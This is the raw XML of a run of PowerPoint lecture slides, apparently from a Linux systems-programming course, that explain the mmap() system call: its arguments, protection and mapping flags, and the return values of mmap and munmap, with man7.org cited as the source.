                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> length);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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71</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29603594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7524328" y="2675467"/>
            <a:ext cx="756072" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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72</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>How to use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mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> function in C language? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Bamdeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Ghosh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://linuxhint.com/wp-content/uploads/2020/07/1-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460616"/>
            <a:ext cx="5789282" cy="3848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3542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7884368" y="2636912"/>
            <a:ext cx="792088" cy="3489251"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>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73</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>() System Call             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Alan L. Cox et al.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="m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499413"/>
            <a:ext cx="5450979" cy="3675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3255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rPr>
              <a:t>mmap</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solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>creates a new mapping in the virtual address space of the calling process. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The starting address for the new mapping is specified in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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> argument specifies the length of the mapping (which must be greater than 0). </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:b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74</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Usage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12760652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6"/>
            <a:ext cx="8496944" cy="3705861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, then the kernel chooses the (page-aligned) address at which to create the mapping; this is the most portable method of creating a new mapping. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, then the kernel takes it as a hint about where to place the mapping; on Linux, the kernel will pick a nearby page boundary (but always above or equal to the value specified by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/sys/</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vm</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mmap_min_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) and attempt to create the mapping there. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If another mapping already exists there, the kernel picks a new address that may or may not depend on the hint. </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75</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Argument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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11996212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6"/>
            <a:ext cx="7732381" cy="3849877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The contents of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>file mapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(as opposed to an anonymous mapping; see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MAP_ANONYMOUS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>below), are initialized using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> bytes starting at offset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offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in the file (or other object) referred to by the file descriptor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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> must be a multiple of the page size as returned by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sysconf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_SC_PAGE_SIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>After the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mmap</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call has returned, the file descriptor,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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, can be closed immediately without invalidating the mapping.</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76</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>File Mapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17224502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2420888"/>
            <a:ext cx="8928991" cy="4104456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The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prot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> argument describes the desired memory protection of the mapping (and must not conflict with the open mode of the file).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It is either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PROT_NONE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or the bitwise OR of one or more of the  following flags:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>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PROT_EXEC</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Pages may be executed.</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PROT_READ</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Pages may be read.</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PROT_WRITE</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Pages may be written.</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PROT_NONE</a:t>
            </a:r>
          </a:p>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              Pages may not be accessed.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>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77</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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rPr>
              <a:t>prot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Argument </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20248975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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> argument determines whether updates to the mapping are visible to other processes mapping the same region, and whether updates are carried through to the underlying file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>This behavior is determined by including exactly one of the available values in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</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78</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Argument </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40456585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7"/>
            <a:ext cx="8496944" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>On success,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mmap</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returns a pointer to the mapped area. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>On error, the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MAP_FAILED (that is, (void *) -1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is returned, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>errno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is set to indicate the error. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>On success,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munmap</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returns 0. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>On failure, it returns -1, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>errno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is set to indicate the error (probably to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EINVAL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>).</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79</a:t>
            </a:fld>
